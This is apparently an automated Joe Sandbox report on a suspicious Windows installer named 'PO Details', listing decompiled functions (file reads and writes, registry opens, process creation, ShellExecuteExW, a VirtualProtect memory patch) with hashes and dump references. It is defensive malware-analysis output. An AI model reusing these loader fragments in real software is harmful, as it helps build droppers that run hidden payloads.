RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402DEF,00000000,?,?), ref: 004062D5

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
Instruction ID: 3317d7e482e8079663a6db4a97809581e22c1b07b88153a27e00a08cc0e2c803
Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
Instruction Fuzzy Hash: 52E0ECB2020109BEEF19AF90DD1ADBB371DEB04350F01492EF916E4091E6B5A930AA74

Uniqueness

Uniqueness Score: -1.00%

Function 00405F8A Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F8A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405f8e
0x00405f9e
0x00405fa6
0x00000000
0x00405fad
0x00000000
0x00405faf

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00000000,0040329E,?,00000004,00000000,00000000,00000000), ref: 00405F9E

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: f93b0abb86e743badb4163669300e0f642a0e5fa5e5e92c65fa389833edf0ca2
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: D7E08C3220121AEBEF11AE618C04EEBBB6CFF01360F004832F910E6240D238E8218BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405FB9 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405FB9(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405fbd
0x00405fcd
0x00405fd5
0x00000000
0x00405fdc
0x00000000
0x00405fde

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403430,000000FF,0041EA20,?,0041EA20,?,?,00000004,00000000), ref: 00405FCD

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: c6b158df49e6f5968e08b93a39371abef257cf80c9060b8b5a86bf4d0676d75d
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: 1FE0EC3225065AABDF109E669C04EEB7B6CEB053A0F004837FA55E3190D635E821DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E4929DF Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6e495048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6e49505c, 4, 0x40, 0x6e49504c); // executed
					 *0x6e49505c = 0xc2;
					 *0x6e49504c = 0;
					 *0x6e495054 = 0;
					 *0x6e495068 = 0;
					 *0x6e495058 = 0;
					 *0x6e495050 = 0;
					 *0x6e495060 = 0;
					 *0x6e49505e = 0;
				}
				return 1;
			}

0x6e4929e8
0x6e4929ed
0x6e4929fd
0x6e492a05
0x6e492a0c
0x6e492a11
0x6e492a16
0x6e492a1b
0x6e492a20
0x6e492a25
0x6e492a2a
0x6e492a2a
0x6e492a32

APIs

VirtualProtect.KERNELBASE(6E49505C,00000004,00000040,6E49504C), ref: 6E4929FD

Memory Dump Source

Source File: 00000001.00000002.9314657277.000000006E491000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E490000, based on PE: true

Associated: 00000001.00000002.9314566108.000000006E490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.9314713092.000000006E494000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.9314753504.000000006E496000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e490000_PO Details.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 32c2c944e8fa4dc7ba0a5dba6401c406470d0588a69047d34a6beba49cfba4bc
Instruction ID: 8c461c18506f10bf77028d9f3d4ea3a87770e6465241f611f2c39fba3e50d614
Opcode Fuzzy Hash: 32c2c944e8fa4dc7ba0a5dba6401c406470d0588a69047d34a6beba49cfba4bc
Instruction Fuzzy Hash: BAF0C9B0515B80DECB50EF7AA445B093FE0B72B347B30452AE148FA245E33C4446DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0040627E Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040627E(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406203(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x00406288
0x0040628f
0x004062a2
0x00000000
0x004062a2
0x00406293
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040630C,?,00000000,?,?,Call,?), ref: 004062A2

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
Instruction ID: 30c71471ac55a0486040fafebf39dce1c160f5eedd86b0188f7d98683811911a
Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
Instruction Fuzzy Hash: 45D0123254020DBBEF11AF90ED01FAB375DAB08351F01442AFE16A4091D775D530A724

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402D3E(0xfffffff0),  *(_t11 - 0x2c)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x00402925
0x00402925
0x00402bc5
0x00402bd1

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 6dacddc76bbd2e370647182dc3839675bb6107cdcedae3b936a99984db943ce1
Instruction ID: a93de1ea602b80332484b308aebd2b3b1e31a5c4c7fa674852030dd18b7254c5
Opcode Fuzzy Hash: 6dacddc76bbd2e370647182dc3839675bb6107cdcedae3b936a99984db943ce1
Instruction Fuzzy Hash: AAD01772B041049BCB00DFA9AA48A9E73B0EF64328B308537D121F21D0D6F899419A29

Uniqueness

Uniqueness Score: -1.00%

Function 004043B3 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004043B3(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x433ed8; // 0x1038c
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004043b3
0x004043ba
0x004043c5
0x00000000
0x004043c5
0x004043cb

APIs

SendMessageW.USER32(0001038C,00000000,00000000,00000000), ref: 004043C5

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
Instruction ID: a8bf680dc00a45444681dc473137f9a6d1885d4682ebfcc4eb1f2e5ca771b872
Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
Instruction Fuzzy Hash: 66C04C71754600BADA108B509E46F0677546750701F189429B641A50E0C674E410D61C

Uniqueness

Uniqueness Score: -1.00%

Function 0040347D Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040347D(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x0040348b
0x00403491

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 0040348B

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00405A3D Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A3D(struct _SHELLEXECUTEINFOW* _a4) {
				struct _SHELLEXECUTEINFOW* _t4;
				int _t5;

				_t4 = _a4;
				_t4->lpIDList = _t4->lpIDList & 0x00000000;
				_t4->cbSize = 0x3c; // executed
				_t5 = ShellExecuteExW(_t4); // executed
				return _t5;
			}

0x00405a3d
0x00405a42
0x00405a46
0x00405a4c
0x00405a52

APIs

ShellExecuteExW.SHELL32(?), ref: 00405A4C

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040439C Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040439C(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
				return _t2;
			}

0x004043aa
0x004043b0

APIs

SendMessageW.USER32(00000028,?,00000001,004041C7), ref: 004043AA

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08

Uniqueness

Uniqueness Score: -1.00%

Function 00404389 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404389(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x42d264, _a4); // executed
				return _t2;
			}

0x00404393
0x00404399

APIs

KiUserCallbackDispatcher.NTDLL(?,00404160), ref: 00404393

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401FA4(void* __ecx) {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t17 = __ecx;
				_t19 = E00402D3E(_t15);
				E00405479(0xffffffeb, _t7); // executed
				_t9 = E004059FA(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E004068B1(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406358( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401fa4
0x00401faa
0x00401faf
0x00401fb5
0x00401fba
0x00401fbe
0x00402925
0x00401fc4
0x00401fc7
0x00401fca
0x00401fd2
0x00401fe1
0x00401fe3
0x00401fe3
0x00401fd4
0x00401fd8
0x00401fd8
0x00401fd2
0x00401fea
0x00401feb
0x00401feb
0x00402bc5
0x00402bd1

APIs

Part of subcall function 00405479: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,00000000,00425A20,766923A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
Part of subcall function 00405479: lstrlenW.KERNEL32(004033B0,Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,00000000,00425A20,766923A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
Part of subcall function 00405479: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,004033B0), ref: 004054D4
Part of subcall function 00405479: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll), ref: 004054E6
Part of subcall function 00405479: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
Part of subcall function 00405479: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
Part of subcall function 00405479: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534

Part of subcall function 004059FA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 00405A23
Part of subcall function 004059FA: CloseHandle.KERNEL32(?), ref: 00405A30

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 004068B1: WaitForSingleObject.KERNEL32(?,00000064), ref: 004068C2
Part of subcall function 004068B1: GetExitCodeProcess.KERNEL32(?,?), ref: 004068E4

Part of subcall function 00406358: wsprintfW.USER32 ref: 00406365

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: fd63206e802c0d6b08ee2c0b785af67798c8d0cdcb2ad02036aa23bf05e0b122
Instruction ID: 70f87f17d48a981753e2349e7fd5e29e0bd5cf5a9d75e43b79cc9d2baa006ef6
Opcode Fuzzy Hash: fd63206e802c0d6b08ee2c0b785af67798c8d0cdcb2ad02036aa23bf05e0b122
Instruction Fuzzy Hash: 05F09632905111EBCB10AFA589849DE72B4DF00314B25453BE552B31D0C7BC0D419A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402D1C(_t7);
				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d7
0x004014d8
0x004014e1
0x004014e4
0x004014e8
0x004014e8
0x004014ea
0x00402bc5
0x00402bd1

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
